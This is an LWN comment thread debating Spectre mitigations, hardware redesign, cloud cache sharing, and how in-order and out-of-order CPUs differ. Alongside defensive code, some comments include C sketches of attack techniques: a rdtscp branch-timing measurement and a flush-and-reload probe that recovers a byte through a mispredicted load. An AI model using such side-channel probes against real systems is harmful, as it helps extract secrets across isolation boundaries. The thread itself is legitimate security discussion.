
Avoiding retpolines with static calls

Posted Mar 29, 2020 18:30 UTC (Sun) by NYKevin (subscriber, #129325)
In reply to: Avoiding retpolines with static calls by anton
Parent article: Avoiding retpolines with static calls

> (hopefully a short one curtailed by the introduction of properly fixed hardware).

As I currently understand things, this is at best optimistic.

Spectre is not a simple hardware flaw that you can fix by rearranging a few transistors. It is a design flaw in speculative execution itself. Spectre has been endemic to every general-purpose microprocessor that has been manufactured in the past twenty or more years (and probably most special-purpose microprocessors too). To "fix" it, you would have to completely redesign, not just one or two architectures, but the entire concept of what a modern microprocessor looks like.

I am open to being corrected, of course. It's entirely possible that some manufacturers have gone down that "redesign everything from the ground up" road that I described, or perhaps they found a simpler path forward. But my current understanding is that workarounds, usually at higher layers of the system, are all we've got right now and for the foreseeable future.



Avoiding retpolines with static calls

Posted Mar 29, 2020 18:47 UTC (Sun) by Cyberax (✭ supporter ✭, #52523) [Link] (9 responses)

Speculative (mis-)execution is not a problem in itself, it's the fact that it may cause observable side effects. So one avenue of attack on this problem is removing the side effects.

Avoiding retpolines with static calls

Posted Mar 29, 2020 20:56 UTC (Sun) by anton (subscriber, #25547) [Link] (6 responses)

Yes. E.g., do not update the caches from speculative loads. Instead, keep the load results in a private buffer and only update the caches if the loads become non-speculative, or when they are committed.

Another avenue is to make it hard to train the predictor for a Spectre v2 exploit, e.g., by scrambling the input and/or the output of the predictor with a per-thread secret that changes now and then. You can combine this avenue with the other one.
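
A minimal software model of that scrambling idea (everything here is made up for illustration: the table size, the hash, and the names; real hardware would implement this differently):

/* Toy model of an indirect-branch predictor (BTB) whose index and stored
 * target are both mixed with a per-thread secret that is re-randomized
 * periodically. All sizes and names are invented for this sketch. */
#include <stdint.h>

#define BTB_ENTRIES 4096

struct btb {
    uint64_t key;                  /* per-thread secret, re-keyed now and then */
    uint64_t target[BTB_ENTRIES];  /* scrambled predicted targets */
};

static uint64_t scramble(uint64_t x, uint64_t key)
{
    x ^= key;
    x *= 0x9E3779B97F4A7C15ull;    /* any decent mixing step will do */
    return x ^ (x >> 29);
}

static unsigned btb_index(const struct btb *b, uint64_t branch_pc)
{
    return scramble(branch_pc, b->key) & (BTB_ENTRIES - 1);
}

static void btb_update(struct btb *b, uint64_t branch_pc, uint64_t target)
{
    b->target[btb_index(b, branch_pc)] = target ^ b->key;  /* scramble the output too */
}

static uint64_t btb_predict(const struct btb *b, uint64_t branch_pc)
{
    return b->target[btb_index(b, branch_pc)] ^ b->key;    /* unscramble on use */
}

Without knowing the per-thread key, an attacker cannot tell which branches alias in the table and cannot inject a chosen target, and re-keying limits how much can be learned before the mapping changes.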

Avoiding retpolines with static calls

Posted Mar 29, 2020 21:01 UTC (Sun) by Cyberax (✭ supporter ✭, #52523) [Link]

I spoke with hardware people about this a couple of years ago, and they had some ideas, such as separate speculative caches that can be referenced only from speculative contexts, or adding an artificial access delay to cache lines that were filled from speculative contexts. I'm sure other ideas will come in the future.

Avoiding retpolines with static calls

Posted Mar 30, 2020 1:52 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (4 responses)

I'm not convinced that is sufficient. If there is any statistical relationship between any part of the processor's observable behavior and any data that any higher-level code might possibly consider a "secret," then you can perform a statistical analysis of that behavior to recover that secret, with arbitrarily good statistical confidence (depending on the available data). This is basic information theory. Adding noise at random parts of the processor will force the attacker to gather more data, but if the system under attack belongs to a cloud provider, then that's not an obstacle (because renting out processors for extended periods is their entire business model).

The problem is that performance is a form of observable behavior. So you have to completely disentangle performance variations from every piece of data in main memory, cache, and registers, or else you have to exhaustively prove that the code under execution has access to that data, in every security model that the system cares about. The latter would extend to, for example, determining that the code under execution lives inside of a Javascript sandbox and should not be allowed to access the state of the rest of the web browser. I don't see how the processor can be reasonably expected to do that, so we're back to the first option: The processor's performance must not vary in response to any data at all. But then you can't have a branch predictor.

I would really like someone to convince me that I'm wrong, because if true, this is rather terrifying. But as far as I can see, there is no catch-all mitigation for this problem.

Avoiding retpolines with static calls

Posted Mar 30, 2020 2:32 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (2 responses)

> because renting out processors for extended periods is their entire business model
Pretty much all major cloud computing providers assign CPUs exclusively to customers, except maybe for the cheapest offerings (like T2/T3 instances on AWS).

Avoiding retpolines with static calls

Posted Apr 2, 2020 8:35 UTC (Thu) by wahern (subscriber, #37304) [Link] (1 responses)

By CPUs, do you mean cores or packages? Multiple cores on a single package share cache (e.g., L3) and are vulnerable to cross-core, cross-VM leaks. (See https://www.usenix.org/system/files/conference/usenixsecu....) I don't know how much of a headache cross-package attacks that exploit cache-coherency protocols are, but such attacks exist in the literature, and I'd keep them in mind for high-value assets absent details from AWS.

I'd be surprised if the bulk of instances were package-isolated. The Xeon Platinum 8175M used for M5 instances has 24 cores per package, 48 threads, and therefore 48 vCPUs. AFAIU, EC2 doesn't share cores, but a vCPU is still the equivalent of a logical SMT-based core, so any instance type using fewer than 47 vCPUs would leave at least an entire core unused. AWS offers 2-, 8-, 16-, 32-, 48-, 64-, and 96-vCPU M5 instances. I'd bet that a large number, and probably a majority, of customers are using 2- to 32-vCPU instances, that those invariably share packages, and thus share L3 cache. And I'd also bet that 64-vCPU instances share one of their packages with other instances.
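
As a back-of-the-envelope check using only the figures above (the actual placement policy is AWS-internal, so this is just arithmetic, not a claim about how AWS packs instances):

48 vCPUs per package = 24 cores x 2 SMT threads
32-vCPU instance: 48 - 32 = 16 vCPUs (8 cores) left on its package for other tenants
64-vCPU instance: spans two packages however it is split (48 + 16, 32 + 32, ...), so at least one of those packages has 16 or more spare vCPUs that another instance could occupy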

Avoiding retpolines with static calls

Posted Apr 2, 2020 16:37 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

I'm pretty sure AWS splits nodes in such a way that instances don't share cache.

> I'd keep in mind for high-value assets absent details from AWS.
All major cloud providers also have dedicated instances that won't be shared across customers. In the case of AWS, you can even run your own T2/T3 instances on top of dedicated hardware nodes.

Avoiding retpolines with static calls

Posted Mar 30, 2020 9:50 UTC (Mon) by anton (subscriber, #25547) [Link]

It's not clear what attack scenario you have in mind. Can you give an example?

If you are referring to the scrambling of the branch predictor inputs and outputs, note that the secret changes regularly (with an interval designed such that only a small part of the secret can be extracted).

Concerning attacks from within the same thread (as in JavaScript engines), assuming good-enough scrambling, the attacker cannot predict which other branches a branch is aliased with in the branch predictor, and also cannot get the prediction to branch to the gadget the attacker wants to be speculatively executed.

Concerning observable behaviour: lots of things are theoretically observable (e.g., through power consumption or electromagnetic emissions), and some have been exploited in practice against other components (e.g., emissions from CRTs or screen cables to watch what you are watching). But the danger is that you get into a "the sky is falling" mode of thinking that does not differentiate between attacks by how realistic they are. I have seen hardware and software providers blamed for waiting for a demonstrated attack before acting, but OTOH, if they acted on every far-fetched theoretical weakness (not even an attack scenario) that somebody worries about, they would not have a product.

Avoiding retpolines with static calls

Posted Apr 2, 2020 9:32 UTC (Thu) by ras (subscriber, #33059) [Link] (1 responses)

Uhmmm, in this case the side effect they are exploiting is the speed-up of the program. That happens to be the very side effect caches were added for. Any mitigation will reduce that highly desirable side effect, and thus reduce the usefulness of caches in general.

The more general problem is privilege separation. This is just a case of lower-privilege code being able to deduce what higher-privilege code left in its cache. I wonder how long it will be before someone figures out how to exploit Spectre via a JavaScript JIT, or wasm. The only solution is hardware protecting the browser memory from the JavaScript, but the hardware doesn't provide anything lightweight enough. If we did have something lightweight enough, microkernels would be more viable.

Avoiding retpolines with static calls

Posted Apr 2, 2020 12:04 UTC (Thu) by anton (subscriber, #25547) [Link]

The question is how much a proper hardware mitigation costs compared to the current mitigations. So what are the costs of not updating caches on speculative memory accesses?

If the access becomes non-speculative (the vast majority of cases in most code), the caches will be updated a number of cycles later. The performance impact of that is minimal.

If the access is on a mispredicted path, the caches will not be updated. If the line is then not accessed before it would have been evicted, this is a win. If the line is accessed, we incur the cost of another access to an outer cache level or to main memory. A somewhat common case is a short if followed by a load after it ends: if the if is mispredicted and the load misses the cache, the speculative execution will first perform an outer access, and the load will then be re-executed on the corrected path and perform the outer access again; the cost here is the smaller of the cache-miss cost and the branch-misprediction cost. And the combination is relatively rare.
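
A contrived C fragment of that pattern (the function and its arguments are made up for illustration):

/* If the branch on 'cond' is mispredicted and *p misses the cache, a CPU
 * that discards speculative cache fills performs the outer-level access
 * twice: once on the wrong path, once after the misprediction is resolved. */
int after_short_if(int cond, int a, const int *p)
{
    int x = 0;
    if (cond)          /* short if, possibly mispredicted */
        x = a;
    return x + *p;     /* load after the if has ended; may miss the cache */
}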

Overall, not updating caches on speculative memory accesses reduces the usefulness of caches by very little, if at all (there are also cases where it increases the usefulness of caches).

A Spectre-based exploit using JavaScript was published quite early on. No, MMU-style memory protection is not the only solution; Spectre-safe hardware, as outlined above, would also be a solution.

Avoiding retpolines with static calls

Posted Apr 2, 2020 11:58 UTC (Thu) by davecb (subscriber, #1574) [Link] (9 responses)

re: Spectre has been endemic to every general-purpose microprocessor that has been manufactured in the past twenty or more years

I suspect that the CPU family used in the T5 from (the late, lamented) Sun Microsystems dodged this: its claim to fame was running other, non-blocked code whenever a thread was blocked on a memory fetch, as described in https://en.wikipedia.org/wiki/UltraSPARC_T1

Avoiding retpolines with static calls

Posted Apr 2, 2020 12:27 UTC (Thu) by anton (subscriber, #25547) [Link] (8 responses)

Generally, in-order implementations are not affected, and existing out-of-order implementations are affected; not because it's impossible to make Spectre-immune OoO implementations, but because nobody thought about how to do it when these CPUs were designed (Spectre was discovered later).

The UltraSPARC T1 through SPARC T3 are in-order, but the SPARC T4, T5, M7, and M8 are OoO. Running other threads on a cache miss does not protect against Spectre: the cache or other microarchitectural state can still be updated by a speculative load.

Recent in-order CPUs include Cortex A53 and A55, and Bonnell, the first generation of Intel's Atom line.

Avoiding retpolines with static calls

Posted Apr 2, 2020 12:47 UTC (Thu) by davecb (subscriber, #1574) [Link]

Many thanks!

Interestingly, the kind of side-channel attack that Spectre and friends are variants of was studied back in the mainframe days, well before anyone got around to inventing them (;-))

--dave

Avoiding retpolines with static calls

Posted Apr 2, 2020 13:27 UTC (Thu) by farnz (subscriber, #17727) [Link] (6 responses)

Note, though, that even in-order CPUs can be affected. The core of Spectre-family attacks is that the CPU speculatively executes code that changes microarchitectural state, and thus any CPU with speculation can be affected. There are demonstrations suggesting that the Cortex A53, for example, is partially affected by Spectre, but the resulting side channel is too limited to be practical with the currently known exploits.

In theory, even a branch predictor can carry enough state to be attacked!

Avoiding retpolines with static calls

Posted Apr 2, 2020 15:12 UTC (Thu) by davecb (subscriber, #1574) [Link]

Yes: in an experiment at Sun, we found branch prediction could cause differing numbers of cache-line fills. Logically you could use it to signal single bits, for a lowish-speed side channel.

Avoiding retpolines with static calls

Posted Apr 2, 2020 15:37 UTC (Thu) by anton (subscriber, #25547) [Link] (4 responses)

Yes, in-order CPUs perform branch prediction and use it to run the first predicted instructions through several pipeline stages, but normally they do not do anything that depends on the result of one of the predicted instructions; they would need some kind of register-renaming functionality for that, and if, as a hardware designer, you go there, you might as well do a full OoO design.

A Spectre-style attack consists of a load of the secret, and some action that provides a side channel, with a data flow from the load to the action (otherwise you don't side-channel the secret). An OoO processor can do that, but an in-order processor as outlined above cannot AFAICS. If you can provide a reference to the A53 demonstration, I would be grateful.

Avoiding retpolines with static calls

Posted Apr 2, 2020 18:18 UTC (Thu) by farnz (subscriber, #17727) [Link] (1 responses)

Even something as apparently trivial as using the branch predictor to decide which instructions to fetch is enough to create a timing difference that Spectre-type exploits can detect. "All" I need to do is ensure that the branch predictor correctly predicts for a single value of the secret and mispredicts for all others (or vice versa), and have a timer that lets me determine whether or not the prediction was correct (made easier if I can control the L1I$ contents), and I have a side channel. Not a very good side channel, but enough that I can extract secrets slowly.
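
A rough sketch of the timing measurement on x86 (all names here are hypothetical and this is not any real demonstration, just the general principle):

#include <stdint.h>
#include <x86intrin.h>

static const uint8_t secret = 42;   /* stand-in for the value being probed */

/* The branch below is taken for exactly one guess value, so the branch
 * predictor's state, and hence the timing of a call, depends on the secret. */
static void victim_branch(uint8_t guess)
{
    if (guess == secret)
        __asm__ volatile("" ::: "memory");   /* some work on the taken path */
}

/* A correctly predicted branch completes measurably faster than a
 * mispredicted one; that is the timing difference described above. */
static uint64_t time_victim(uint8_t guess)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    victim_branch(guess);
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

In practice one would average many such measurements per guess to separate the correctly predicted case from the mispredicted ones.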

And there's no point having a branch predictor if you then insert a pipeline bubble that means that there's no timing difference between a correct prediction and a mispredict; it's that timing difference that creates the side-channel, though, so you need to somehow prevent the attacker from measuring a timing difference there to be completely Spectre-free.

The demonstration was something in-house, using exactly the components I've described above; it was a slow enough channel to be effectively useless, but it existed.

Avoiding retpolines with static calls

Posted Apr 3, 2020 7:59 UTC (Fri) by anton (subscriber, #25547) [Link]

Yes, the branch predictor can be used as the side channel; in a Spectre-type attack the action part would then be a branch.

But for a Spectre-type attack the branch predictor needs to be updated based on the speculatively loaded value. This does not happen in in-order processors (because the execution does not get that far), and it will not happen in a Spectre-resistant OoO CPU (e.g., by only updating the branch predictor based on committed branches).

Note that not all side-channel attacks are Spectre attacks. We can prevent some side channels through hardware design. E.g., there are Rowhammer-immune DRAMs; I also dimly remember some CPU-resource side channel (IIRC a limitation on the cache ports) that was present in one generation of Intel CPUs, but not in the next generation, which had more resources. Closing other side channels in the non-speculative case appears to be too expensive, e.g., cache and branch predictor side channels, as you explain.

There are established software mitigations (branchless code and data-independent memory accesses in the code that handles these secrets) for protecting critical secrets such as encryption keys from non-Spectre/Meltdown side channels. But these do not help against Spectre, because Spectre can use all the code in the process to extract the secret.
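
For example, a generic branchless selection idiom of the kind used in such code (a sketch, not taken from any particular library) looks like:

#include <stdint.h>

/* Returns a if bit is 1, b if bit is 0, without a secret-dependent branch
 * or memory access: the condition only ever feeds a bitmask. */
static uint32_t ct_select(uint32_t bit, uint32_t a, uint32_t b)
{
    uint32_t mask = (uint32_t)0 - (bit & 1);   /* all ones or all zeros */
    return b ^ ((a ^ b) & mask);
}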

From your description, you read about a non-Spectre side-channel attack through the branch predictor of the A53.

Avoiding retpolines with static calls

Posted Apr 3, 2020 14:30 UTC (Fri) by excors (subscriber, #95769) [Link] (1 responses)

> A Spectre-style attack consists of a load of the secret, and some action that provides a side channel, with a data flow from the load to the action (otherwise you don't side-channel the secret). An OoO processor can do that, but an in-order processor as outlined above cannot AFAICS.

I don't see why in-order processors couldn't do that, in principle. They're still going to do branch prediction, and speculatively push some instructions from the predicted target into the start of the pipeline. Once they detect a mispredict they'll flush the pipeline and start again with the correct target. As long as the flush happens before the mispredicted instructions reach a pipeline stage that writes to memory or to registers, that should be safe (ignoring Spectre). But if the mispredicted instructions read from a memory address that depends on a register (which may contain secret data), and the read modifies the TLB state or cache state, then it would be vulnerable to Spectre-like attacks.

(I'm thinking of an artificial case like "insecure_debug_mode = 0; int x = secret; if (insecure_debug_mode) x = array[x];", where mispredicting the 'if' means the very next instruction will leak the secret data via the cache. It doesn't need a long sequence of speculative instructions. That could be a case where the programmer has carefully analysed the expected code path to avoid data-dependent memory accesses etc., so their code is safe from side-channel attacks according to the advertised behaviour of the processor, but the processor is speculatively executing instructions that the programmer did not expect to be executed, so I think that counts as a Spectre vulnerability. As I see it, the fundamental issue with Spectre is that it doesn't matter how careful you are about side channels when writing code, because the processor can (speculatively) execute an arbitrarily different piece of code that is almost impossible for you to analyse.)
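
A fleshed-out sketch of that artificial case with a flush-and-reload probe on x86 (all names are hypothetical, and whether a given in-order core actually leaks this way depends on how far the wrong-path load gets before the flush):

#include <stdint.h>
#include <x86intrin.h>

#define CACHE_LINE 64

static volatile int insecure_debug_mode = 0;     /* architecturally always 0 */
static uint8_t probe[256 * CACHE_LINE];          /* one cache line per byte value */

void victim(uint8_t secret)
{
    int x = secret;
    if (insecure_debug_mode)                     /* never taken, but may be predicted taken */
        (void)*(volatile uint8_t *)&probe[x * CACHE_LINE];  /* wrong-path, cache-visible load */
}

/* Attacker side: flush the probe lines, let victim() run with the branch
 * trained to "taken", then time each line; the fastest one reveals x. */
int recover_byte(void)
{
    uint64_t best_time = (uint64_t)-1;
    int best = -1;

    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * CACHE_LINE]);

    /* ... victim(secret) runs here ... */

    for (int i = 0; i < 256; i++) {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*(volatile uint8_t *)&probe[i * CACHE_LINE];
        uint64_t t1 = __rdtscp(&aux);
        if (t1 - t0 < best_time) {
            best_time = t1 - t0;
            best = i;
        }
    }
    return best;
}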

In practice, in-order processors seem to typically have short enough pipelines that the misprediction is detected within a few cycles, before the mispredicted instructions have got far enough through the pipeline to have any side effects. But that seems more by luck than by design, and maybe some aren't quite lucky enough. OoO processors aren't more dangerous because they're OoO, they're more dangerous because they typically have much longer pipelines and mispredicted instructions can progress far enough to have many side effects.

Avoiding retpolines with static calls

Posted Apr 3, 2020 16:10 UTC (Fri) by anton (subscriber, #25547) [Link]

So you are thinking about an architecturally visible (i.e., non-speculative) secret, and using speculation only for the side channel. One difference from the classical Spectre attacks is that, like for non-speculative side-channel attacks, software developers only need to inspect the code that deals with the secret and avoid such ifs there; but yes, it's an additional rule they have to observe in such code.

The length of the pipeline of an OoO processor is not the decisive factor. Unlike an in-order processor, speculatively executed instructions on an OoO do not just enter the pipeline, they produce results that other speculatively executed instructions can use as inputs. Essentially the in-order front end (instruction fetch and decoding) is decoupled from the in-order commit part (where the results become architecturally visible) by the OoO engine, and the front end can run far ahead (by hundreds of instructions and many cycles) of the commit part.

